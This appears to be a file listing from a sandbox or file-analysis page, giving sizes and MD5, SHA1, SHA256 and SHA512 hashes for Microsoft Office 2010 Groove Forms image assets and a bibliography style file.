Filesize
862B

MD5
68a8584958bdcafc8bcfc76e904ea963

SHA1
6abf82147c2bcbbe34b2499f4a3821ee2d409ae7

SHA256
0123d309f93c212dffc996b8b2d7c40e105ab20bbeefa2a1053fc45dcd69b524

SHA512
5ebcc7237871cc7d42d31a5884480635cdbfada3e71c42e12a34e8ebd50132841811a0066bf83b6103c5eeda92fe83e9404e9ccb2efc549c468443e0e7cd85c6

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF

Filesize
743B

MD5
1c71b1e2dc502e6508ee87d021bd80a5

SHA1
fdf0948fd4748ed3adaf65341556d8cbc6683107

SHA256
87d15de536ec2de82a784aa45704677904c4ea2e7a2017e79ddc7055a4d2500e

SHA512
5303eb6fac57ac2dbf555da8db9b1af8bad4ef640c0e51001f71527ca6c75cae76a9bec4640092f26b7d14361d9c9e306d0936d76c472236316e039cfbf7e922

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\SIST02.XSL

Filesize
239KB

MD5
1a4bf3a9b774e83667649b39abb92e83

SHA1
0e02eac331bf6d8528196020263a07f833922a62

SHA256
7b74bff50ce596bb9cc90826785af4e6c19517b5f5ed9feca06af98ddd2414f3

SHA512
2b0f0c071b95a3ebca597c7f6afd885689c56566b64e778f8958963e28f9499ede47f956c53c869bdca90a94bc98b25652d36f4bd7f98e1cd339ee73e8b9ad1e

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\BG_ADOBE.GIF

Filesize
24KB

MD5
1c0cee0d226bc14557d1735ac2ae1834

SHA1
31f7a685bc4be62f82dcdcfdf0685b3217259712

SHA256
1bc88059f03d4c4408722a317c6df4d42092e5d42c82248e35e3c9894fb42168

SHA512
cd6716f46d0f5332b447c830c7e8338c754c1893602330dc697625e7f9c853fbc3825e22d665b30c51860522f7ba24c4df053c7d1d3f167ac6f88f81a01b4db8

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\BUTTON.GIF

Filesize
706B

MD5
5325c1efdae26bd309cb74b742ffb57d

SHA1
91f31602e15d0aae6a95597e24ed9b7947c27e74

SHA256
3fcb88b5aebad8d3d25d82463bc0afa436e0fb053d497522a17c3bd2858c8b56

SHA512
9a1f167af31c47a3d3589c0d1cfcd9a739c00277d54224a3a621fe2ac1181e89b3ed88747db208f7ab80800fa3c3d154dfa0109d97dcf51fb7ca3ee186cfa76b

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_OFF.GIF

Filesize
1017B

MD5
c36b1c011dd214b51f63de3eb2754934

SHA1
10c22b5030be3b48ff3167a3c182a20be8f12e16

SHA256
4b291d60b4513d69f753a10ba40ba58cb1a1fb0f117cb2c2c99c72c8afbda683

SHA512
4a25362a679381ef8bf8b4493ffb26d9fe617358a46ac6fb7bdfe4802c6ac604366a01e0126c204b2920ba29bfc670c700e444ac1619b56f38ead8fa8eda8f7d

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_ON.GIF

Filesize
1KB

MD5
e04531acc63db7b4aa29a64254700dc4

SHA1
a09878ecc2f3f00b5a4297a1d3b5dca6af9e6038

SHA256
b07c98ecb3d14fa43501c379dbafc225d69124206d8bd1930cc9168620fa3038

SHA512
b406212a56277c9c5adc1ff6e6023ac2ead8bc98fef2f56e61662adb9185a70e26ade6833caee0f50f7ed3e4a971a6bddb923b671de13e75b41f4d0aa8d34568

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Casual.gif

Filesize
6KB

MD5
ad165e8b7966e2e8252bcd830d0ef790

SHA1
3aa38076265efed50ba5a115bcfbb4f740455e2b

SHA256
9dfad1ec75ec07be31b507faf61e684d2aa540e5f3d8dd3e967524f0ec76453a

SHA512
fe2044592cde8ca36fbd7a8f5ba43cf004a8bfe54c46fd6cc91c2544f648430907ec4cb29b87f4ce68b57eab5ffb31dcb8701d8ea9067e0a9c37f705ff3c4717

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Country.gif

Filesize
31KB

MD5
caff98f7a387bb7adbd060700dbc96c9

SHA1
a17e13d1ac3cc173d921e9860be8bc94b634204f

SHA256
e9217caed2ab2cb579abcb7d08767e54b4d56fb58e44e513a4dd6642594f78be

SHA512
603bf774bb58b679ae0da7614ed70ebf755ba284dff442c0f91f1cb55e2f256774f5298c5d991c4d2fb421d59fd938e689c8fbf7e81d86cba29ec13f4228ee6b

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Earthy.gif

Filesize
5KB

MD5
4d1d8175978088710a6475686a669e44

SHA1
c9bae7fac6ab9d076d437d01d5bf2c7a9991fd17

SHA256
812f231a5758214db91e17a0ac08ffcfbb9f9bb6452b284187f018332318782c

SHA512
01ef8ce3ea5b8c15000d451af8e9593fa17952a8242cc9a0f9b3b4d845954995a27b6ecda703a6888e3a3fa1d1c1e260d9bf0cf78a3b64ec1bd90a578fced028

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_GreenTea.gif

Filesize
22KB

MD5
5835e7c1b575cbe5cbc610327e6a4a2b

SHA1
592282922aedb91d5ed77e77c4e6068c6a90bd59

SHA256
6d14b1064678b60c5708548381f86bca24e87762b5a0e8419a7b3e894992bcc6

SHA512
c46f71b521a22fb39182eb1868a33d2214fefde58223f9aadd48caae4d29af055fbb8fcdae5010c3609bbbf87e86d0122a4d29c8b146fba67e34574d595fc077

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Groove.gif

Filesize
627B

MD5
784b3366a7c8d8f5c58fad1457732c5a

SHA1
14e79ea18c927bd01bd83ecc3cbf83c8f51f5d44

SHA256
29ad1e7741a9e8b8fcf5ed63a6df585db2cc9d6188b5b15181bf474ea09687c1

SHA512
ac0c92a953507aaa67e7558ce6475b893f10c9a2dcaa3d11d48b268aa086ae2174fa54693f8a2a60f100798c92454f4a5eec74e0126e819d7f718903a36aeb43

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_LightSpirit.gif

Filesize
8KB

MD5
ac5b650cecfb72d05f5c8cdd10012812

SHA1
71a0506de412ab213989f6e7609d9da94d49087b

SHA256
008eaec749119844d332869ebad903188b376efd90fc9874304a0f58222555e9

SHA512
a0c2f7e2541a5c244ea36374e01bdfbd7c6db6fe53073cb3c12447ef5118b453a6b2ae485b0693e1310259ff0cd35a1674c49468736ca7718418984390b955d3

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_OliveGreen.gif

Filesize
15KB

MD5
bebc62687a12c512a8e1de796621a060

SHA1
ed7e528962a23d73984a5236f6d54f57c4a0735d

SHA256
943f73178792e2bcaa748c779ebb849cc740a3ff957160d1281b06a6ba78249c

SHA512
5bebe825c71217af5d7e8f0c0e64e6bc52db60a67546a3f794a6cca86f66e0cf4a52dc6193312319ffbd462d9c91f6ede9f071339c1513f55a24ffd0570e84fb

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Premium.gif

Filesize
6KB

MD5
b283e2bacd7b2a815d69cd6980f52977

SHA1
4eaf5bdcfba74eff33552ef0abd3b5ed8d09201a

SHA256
fb7de4f3129940320179401baa2ce2d3ba9ff1bdcd1a2a623c2d8230d0395be6

SHA512
c22e0e32b0e39dfa5d4d7615bb7d29de544249b7c88162f50843322ce7863ae5996a3c0e517af9755e07a2d39ae56e2732599e0f8485797e64b0bf8a9676b82d

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_SlateBlue.gif

Filesize
20KB

MD5
5f92dec38d96d2ac5c1c1d423fbfe1f2

SHA1
19babc2ec586c2ad728acec7a2f7d5a84e07976f

SHA256
7caa00f40a28b91ad82fb4019e5e076b3519c70debb960de1bfdd668df9087a3

SHA512
9fdde4a80bcfd5f7eb250801515777eb441191d78cd371bd4af2b49daeb54ad766f30a9fef96503a40ae307b2cd85ceffc0f3e2db3a9dc54a31584c77e581ae9

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif

Filesize
6KB

MD5
df1805b374f5da513e54d82e5060907d

SHA1
f5b5f9858b1668fb2a50e9af67f8b99c9ede0f64

SHA256
8b7b900292898bbe620fa0f51473b3b25cf1a0648bec51382c49814a68196791

SHA512
1a6eea04349c93f4aefa6c12fdd506932a70153c3dc137a61901704c2fdad0abc67dda3db1c07d844dc49ae0554233e157fa47d54904821070c9725eca33105b

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_VelvetRose.gif

Filesize
15KB

MD5
eabd25374f3fad222e82588ac709605e

SHA1
aec4a66bff760a6b6cc00864b37eb2500764493d

SHA256
f072b6101aec4d7e06dd249d85fc2675e1124f570c2af2d11ebb84d08f4b2c6f

SHA512
0440200ca269e1a2a83e2a246f0073dc68526374d0498aea56436659c46f7bd0426e26088dffe15751a4c7dfb0109a7755d1f34a3fa5f5804fa832673cb516c6

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg

Filesize
3KB

MD5
cd0ef716a96a55c5e95316d19fed5824

SHA1
0045f43c815fff4a5439fd7e588356e0b21c4483

SHA256
86dc0e16cd442b3793ec62425263fbc8062c69120f85fa7a9fd1cce3b597c5c7

SHA512
0453a33b3f85648e6209631cbfc0cfb0e8a252d1c0e68647e3c543b6a40dbe49d94f9ad60717306b3bb3c2356a829e2111c85e75e40b4617aaecbc71db6dd379

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp

Filesize
2KB

MD5
ae3eb393672825c04a5959aef04fd447

SHA1
6d018cc070520edd51f6309c688575d8de46c43d

SHA256
660a8727356bb8f9f23c5adaf9a8cbd8422e5b8504d0d5240505541d9bcab542

SHA512
1a078111df40889df93b04efa4980792ca66a42d5faab46bfb7c54528000e23325d85e26570c581c7d979c16d7242ca17696bec49bd451824596447f244def95

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FORM.ICO

Filesize
839B

MD5
5f90fb336eb6a5268e0377a9653b304a

SHA1
b4cfe1210b71ac85042eab5b77ca3c5914f473f2

SHA256
0ed52205aa163ef2ac87c9a5c70fd1ac43523153fe55f1ab8b047d64e4a86c6c

SHA512
1ee81d17f99649a269028dbea89231499cbecc0980ff0b054a9eb0b6128a2df0a64de4a555a3baa12c08f567d846ae1ca233ccc7530e4012b575be08445a4714

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg

Filesize
7KB

MD5
0f605e96918ca9c0a9273d1f27de461b

SHA1
6c564a8e79041738f331fe3414dc4fd1aa04a487

SHA256
a2d302f06ecd2235afc939d5c852fa45bf167ef9c36c0aac633c82095380e140

SHA512
0833888103736a3d78609fd4dde5d734243f23f19362b0bf35ff2054781355f03f971420afe9ee01cb6e0b58eae4300c43405a23aa773ddc27aee4f6b696b19c

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\HEADER.GIF

Filesize
776B

MD5
f637b4f7fcffc82edf8155df3aa3a239

SHA1
23825b4eaeb369015fd52e9b321aae65c1c38d35

SHA256
286023c6b971a0fc8faf51c0556e03367cf278935764de34bfa22f9d50c2eb6e

SHA512
c2c52a2aaa84fd387a62f16cfb752815fc60e89231a8de40bb3ffd98a0353285d4f3ddc63c55aeb5e1db12172d1706b034fc2756b8acb5d6ff9fe4548acdc577

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\background.gif

Filesize
844B

MD5
4f15155ccc9d8f4c8d40187490ec21a4

SHA1
eb2ab4bb44a32472fd5699cd7aa4da36d914508f

SHA256
86a41a28f0f67346d9e5dc9213a30adf1144de245dbd530bb19cb5020832efb0

SHA512
9c8df1168e1d3ee6a9fc60c94d90bb24fa4c2997c4af135035847916590d51637114dc46730f0d5f81d501565d073e6950d6dae08ac942d969473a19b1f68fae

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\HEADER.GIF

Filesize
888B

MD5
7dc0b1238c1aa02bf2060ddd79bf16af

SHA1
5670cc29715e8b190802e68858df9f7710c290ec

SHA256
06f95b2661eb2ad0dfb50ac4f41d366c43f4474c01248b1ed9f0268e860dbc47

SHA512
977dd6c90e674969d06eb25c5633d6f63a814bace502aea93386a5c9ca637f9e28134bb3dea9a5f91041cc27a4cac95588ebf1175c8b7c8b207935615a524ec3

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\HEADER.GIF

Filesize
669B

MD5
779b70000ba6313c409bb49f86074f16

SHA1
9ad0fc028ad6a125902e9e19d50a27ad171682d1

SHA256
640af94b74c332bc12200935d6ac7e7536a06df06271a7a3716b0dbece683fbf

SHA512
d1f6ea24de70ac29ccbb35739c05c9b1855ae2b1d20adbaf6ee2ed6f931c15b0e01967e813e915298ce53072e13abb611ce71ef1b9cc7dd3f73f72009200e35e

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\HEADER.GIF

Filesize
961B

MD5
8efecd9b670fe9762af09dc1418c78bf

SHA1
9610f0bb3e85b23a189cff2b27bd0fbd4d2ffe4a

SHA256
9934c749ab8c7d4df96cfdf4b8663efbe0acac0043648bdc241b9c7fce5dac21

SHA512
f7e9d8c716f34bc07ee294698ba52c1162be62aeaa9692a026d7e238c94aff05c8fd1c2a6cdf8850172b6d0b6c44dba706b46a91440fd28a7303dc8fb94b7f63

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_OFF.GIF

Filesize
983B

MD5
3e1b99f18b40f3fecfa4e387dd6fa91b

SHA1
6a5d81d23686329851a99499bd9dfbff4fcf3797

SHA256
d2f39d3743d8214f01ba3c2764932ce6cff47df0f7278c5cbb79d8133ae7cba2

SHA512
13c56c52e6b2a0b8206b90d146fa2d6680456dd853cfd7a3586704a5a1085f39b2381bfb35a662fcc0166db54f1f9e8d43f16e0c6717b856cdf7d16e19c5fa68

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_ON.GIF

Filesize
788B

MD5
edcfc229485080890cad895350edbbd0

SHA1
ac85462a7563ce89b46a7087291e8bb17ba73e64

SHA256
795f3de1270ade142611934fd521001220e2bab52e196ee07030c93ec657c328

SHA512
fe00b38f4a1dc6dab3a7f4aa292e535f5ddfbb768436c5f99130a5ce89011ff5e33a31c272ff948585de7caccd75a16fc8ffa65f50e1a3cf12f635d535ee5e2f

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\HEADER.GIF

Filesize
2KB

MD5
60f52537e9b6ae0350734fefc5f28b2e

SHA1
a6ca37d1ad09edd5a27f6c243619f3128cbff614

SHA256
591d9daa309273e95922fef622758239b3836ea40b145838beba11598cca4ecc

SHA512
79140d24f92d32219a639cc0e8a329aabe1fe26dc54a7ee7c43a6b7a1f07471b3316e7ecb333db80b79ec7a3ac678a9d3ec5aa39187533ab97ce68438941c20d

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\HEADER.GIF

Filesize
3KB

MD5
9caa375d6fc729b5f69db224bd914e4f

SHA1
245b51b7ac707578d26ab28bab574a388144687e

SHA256
2450e908275a5bf4329aca3b9586f5e70e7e884bb326ed27b06ca0d7681edbea

SHA512
887076a0a473c5a5e3149e5f374e14935b051903ad6acbe7ee72c8996f1f90fb74b64da50581c0945b4b7be283ad9d4e065863d7fe4e38197034d3e4bc304d69

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\TAB_OFF.GIF

Filesize
983B

MD5
62bb0d09e97252393fec21bdf68616e5

SHA1
03f0871cd96f429db6524365982e0a48ce9c2774

SHA256
08227df24ac4929f0e64f61299909692af018bdac006fdf472355e5377ece1b9

SHA512
b64f8ceb6db3cfcbda67c242233560977b7acc606aad673c76630396a12e80682f60ba93de17d62d355ce9a4e044d30800e8f2e6c54555417a7c7d6cd70063e0

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\TAB_ON.GIF

Filesize
785B

MD5
eb108de15dd6fdb8f7e84ac0e43e61c7

SHA1
c1966f1c48a6ba32a779b92903f658bd65d1bb30

SHA256
fbae029a7085a3d7bb7eaf065416a2d2f35dcb79b9e92dd0e702675026257104

SHA512
f2e25778fa17a2cd43251973c5109204993d2513fa5c149598a53ce53f59b03ad4e9ad4d09e2dc0ebbd7e5c01855babbb22e2d164b010eca3578ff33e63b7d60

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\background.gif

Filesize
754B

MD5
cc1a2db6a86917560b5336ff6c05ef4a

SHA1
7a198930418cce2fdcf571b6fbc9acb5b44b30c7

SHA256
2e02c70c60708e3204629c6a20e89a561c8fbbcdc09fddc99e2b417e662b75f8

SHA512
ca207cd062cf1a5b6c5afe6114cc44c694fe6159038b8bcba3ace1789f5263bad261fbefac5b7c7e8b5b0d3922fc1ce176741ca14ccd07a374171dddcdc6b0a7

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_OFF.GIF

Filesize
885B

MD5
464f5ab8b2a03cb928b1ab19933d359c

SHA1
7f23a80eb28282e9d41c07e2a92d92f3552c766a

SHA256
6b0c205b41c9e72b3961498b8504fad7bb4de2dc6c89cad696d41d14fa979cc1

SHA512
99480233da4b7a82a830a81fa14f3fa7e03970027f20498e17d3be543d82db809928347c0d659e744856119ac017f482d7138aa7c8e17bda9732adab4ade5178

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_ON.GIF

Filesize
885B

MD5
c0ec9e09056e9eea58b7c974281d3a99

SHA1
853475b0bd687fe9a5943b8a39a22a9a0ab50f1d

SHA256
afc61a45e3802e11b32890f0278e1dad528c6c89ffadaf2bd24d1101f79df604

SHA512
78155f17c0992a30e550da9793fee5503242308c5dfd016fa4db47c1a940ce5afa3f36e9cb8f4908e3ac404a6de88516501f54bab7ef93ad3d6ea7106950a5f3

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\background.gif

Filesize
7KB

MD5
feff9b763a2278d76b648420197a6d2c

SHA1
cb026358ff35cb80913279a9ea41c0229f6b89b3

SHA256
ef2ce23bb960afd977bbb53b80d4c7e16a691a9e588f1360f596b59b10194ee9

SHA512
48323558f20e01493f2007283542cb627e700ee1117f3b1dadc2b0f0c930aeb53a5a6bb8cb32b6fb0320184204d2c1c703e6030735f523ae4c2ceec7c824ad5e

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\BUTTON.GIF

Filesize
949B

MD5
f8a44f15a362ea5e8a888f72c5e793e1

SHA1
7484d2bb37d143c8e6f303805b07fb110b7c7be7

SHA256
dda2514abf76824a34a7b9fa1dc85072b8bc6a9d68d76dec202e43ebe94f91af

SHA512
7f6f1e7560893dc853282d8e73903008f81d14a50d2b3622c390631dbfd3bc20f5766acf92c6471c41c453c1f284295bdf57017e27cbf02d9d4f649990472ec9

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\HEADER.GIF

Filesize
26KB

MD5
962a59c763f7e266cf0d025f7689c8ed

SHA1
b3139bc99291733f603e182de8b5916dd781e6d4

SHA256
6480d845e7439566bc939bd7b66a25b3f42ff9932778f034597140da584b1007

SHA512
7c4237ca94f5f6e4f7ae9ef1f617975a031344bb355cc44be030b3d006affa6fa3ab998045c3a4a527775d4734c80af68e439238b5b70e5beb7b2953a0482cdd

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\background.gif

Filesize
1KB

MD5
b8dd146aae1280387220d2131c111eec

SHA1
8b3e91ea2d9a5920f63ecad0f3623aa22d0359a2

SHA256
943a63892702e61f27932ff2cb3fd9c80a7b3471b2f99c817fcb947aaddfedb6

SHA512
cc8b678140e2a8b96b9014f04044aff26a07a7d70e68f3b8c7d6c5ebd2c597d7c0351f85495a56e7b28706c1224703d6dbfc6eb7552d19bac650cabcf3673aca

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\RTF_BOLD.GIF

Filesize
1KB

MD5
5648c7a6cc751b645625be7a411fefe5

SHA1
f30a841d5a882b08e055481adf957bba724e37b2

SHA256
9df7b2de8f4302b939af6011164fb7d949c4dcce7ab214ce595f8b2dcd659b6e

SHA512
2a51395a7d9d2d71c662670ecf1913fd43ae11e920e7c874bd291b73f81d76f0319aa57de08e55225f8010bc9b9d35bf5c5cd70095c47c28a6417ace9d997fba

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\VIEW.ICO

Filesize
839B

MD5
0fb7cb0f0d3f4382f46f037fc71218a8

SHA1
898ba3844026cd158c40bde8db53c031e654f5b7

SHA256
275bf7e8982c84ebbc2a9dfb5c5e0d87cc86c34a821eb96a54131e73f2023329

SHA512
e011e5fc651b2cfbedb2be0b9f6e876b3fd19494199687c5a64ec4bce1b5058114f37ebff4a2c68e322f489244c838f743f48d5406f1d769ec64f50a9d597513

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg

Filesize
3KB

MD5
f0c09aac3c68f2b699b752b04d8c0f1a

SHA1
7489de684d044f39febc030274533660d0660181

SHA256
d6e6bfbf0f38616cc91fdce26c32cf842d8f99fa90bbe3a39fa227ff3cb825e2

SHA512
78ab3ea60af7d09003b2d4d844a72f9cface588452cfcb16bd45c344a5ed590955fb4823285f603b69f7d3e48e2b5011176bfc3172b31d4ed5e9b44dc0376469

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\attention.gif

Filesize
3KB

MD5
10a2befcbe0f5372c985ec03c1a0bfea

SHA1
604be8226467cbc2d9d11e13bdd41134a765bfdf

SHA256
85432cca79159947774ba9817591c4a1bcbd9fc4cddfbd762ef513a3f458ca32

SHA512
2ce74f22febdc559a4fe33cc7e4086a7de709f268d767b2382196e49270d3358d6df766442adaf4262cd70c3057ed4d7047a0a18df9ebd240fde881f7af04387

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePageBlank.gif

Filesize
20KB

MD5
3d53e5b3bc0d571a3cab0b97249aa9c1

SHA1
63bf57d6a4fa6760a5b34e35a59659505e1fd4e0

SHA256
1f545e05a61aa0802de8fd5ca56fd871c4b62c195fa18b8e63038bed6f4ba36b

SHA512
63fcbe9655834e3bc6dab9e59c6204a5cf2b6f7287946c068fc0f889eaaf4944ef8c750faf588cb762d4a8d8a9b384fe65a0f533ed1ff176f8dc397f074de245

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_choosefont.gif

Filesize
1KB

MD5
0766dd3213afe9d2a59584b52a636d35

SHA1
e0a978e5c0634f42a588e5287d627a5e124f800f

SHA256
e3e41a0e3d44413fae0b205d6e323794f689d769b3ab6a1bba057bfdb3a4949e

SHA512
bd19cadae9087769d06a5c8b16655b88a24ad7f7af60555a96724d4718a78d3141df11932bbcca5f72a65cf80eb39009a5b1cf7b325578a551171b93370d3cb5

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_italic.gif

Filesize
1KB

MD5
60e1e927ec47dbbd736307e2a62ec532

SHA1
78794f62be2c4fa29886535a37e69e0cda8194ac

SHA256
7f6a7580b4a7cf75796bc1c79c2b7de969f32d3a402386cc0ea64798d4993199

SHA512
e73ef4a381e431673ba023c765cbebfb93a30b55fd10682ea25dde2c38cd3d59f3e8dba1592de4d4d971fbf1191b6a4991f16f8b4a873a145da3d24b992a4bcb

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_underline.gif

Filesize
1KB

MD5
441858f1996684b6886b6280f1b84b41

SHA1
dde69db26f51fbd869b77e997723be787622d6fc

SHA256
3ae5b0a0e771d2f3aa1c4e8c4edd044eec51e0b945a2648592df113e332c8bb5

SHA512
2308ef00633dbb13536b0e403ac293bddc4c186754e07cea24cbc9e063f51f5f7263d8469d78c7832345d64736a1765d8fc32af139a2bba9186be9018e4a2163

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ADD.GIF

Filesize
1KB

MD5
5723eb79fa113151e1d6ae897753014c

SHA1
5951b4e3f99089affcea630112a6ab56bc804e65

SHA256
264cff5ac01df1eebd1ad9750f0a5ca754dd1978eccb50f72b346154268dae07

SHA512
d47b7ff7f35f78482c8291e99b2bd2b6c0ebf1d841b9b08e6c0620d177d2bc4d020b1727b1c5fd854b8e42467482266248d9ffe56c22db4849544fd118e6c064

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\CALENDAR.GIF

Filesize
1KB

MD5
b976043e4c5c51cbf21a5349203cf167

SHA1
606fd3b7a081c9c3992689a1500d4f61410a811e

SHA256
63515827cb86292087eaf4bea7b7560664d52f662d7a50b29a1a916ee96ed47e

SHA512
cbc39f0efa80487c6492922f23e82b69bebbc1f06ceddaa55f595b7559a1d4f8da960ad389f21750ee7e82f0277f0d1cc0cf1648fec95652d5ee84426b3695b6

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\DELETE.GIF

Filesize
1KB

MD5
5ca18b9b0923547d4f66ac4850c15941

SHA1
ec56fb3936af93837559bd9b0d7afae9a27b09bd

SHA256
58fb55416013c5410da0ee0f8e0ad04daaecdab8e07d494af571b42786e55690

SHA512
39973b7754d0edcfddf53090e0dd1a825d6eddc68a08123ee34fe84ebb3b209ee1c7fc8fea130bc18d1879e9a1147449ec8d21940465402560387160c50c69c2

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ERROR.GIF

Filesize
1KB

MD5
762d7b59ab05a37849f5d7043bc29c58

SHA1
0f40ee61202b8e5a0530412bbf17af062ba86aaf

SHA256
c84a32ee62f7c4a5d6c840d1d857c319f1f827198363561e5438b70bad6b963d

SHA512
c0751e1aa509c935efd923e4eee8c65f6d53651133abfd18e54bbb6fe0db64961ca9ddd7e96274e0c816514caeed8667fbb2317a0eab60a170f0dbe80a651b45

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg

Filesize
5KB

MD5
5d247f9e126a446a32d3733d3f0eaf28

SHA1
d75d21c2938254a71b248791a2e6ec2c4b68fdbe

SHA256
b19bd915ee08ca1aab82f2513bb6805f02140e62e9751fbca5c7cd291a6f47bf

SHA512
06d8f833423bb4ecd93608fafcf9c3b6c00d05daa424064ae53e3dcc27a9fceb6fbd754e3921c5017990f79aa5bf89a690801083341dfd3ae8d1bdab62f80307

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIconsMask.bmp

Filesize
2KB

MD5
c7410eb43df769a0803c502f25c0d6a0

SHA1
50c26208a6f0c145b8a0e06f677029a0cdfce1f7

SHA256
c4c12fb74bf68367768632d36497c2164da17f12781fd966e89894ec85d292eb

SHA512
0bdcfc5c288ad237130b41f3d95c7b6c0ebc513c1bf9b9745d4950ec06e83b550db3678c955f83fd4d68e403ef56f48c07724b1c9d115aba87f894459eb126e6

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\LAUNCH.GIF

Filesize
1KB

MD5
2eda9c3c39964dc919fa8de931858e7e

SHA1
afcc0da0c3598a2456a35d172af8095b8ce3be45

SHA256
aa8d309518064126cb1c5d23f0128d5d893b17eea86a69df34ec7cc0dc3792e3

SHA512
6cf84ae694a519eee9dde781a5e82f1c9aa4b67654de6352088a670f704a2f880b1e78fecbda5683acdb4d7d6bae4df2df3bfa900138f3137b46fc12ce4f2933

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignleft.gif

Filesize
1KB

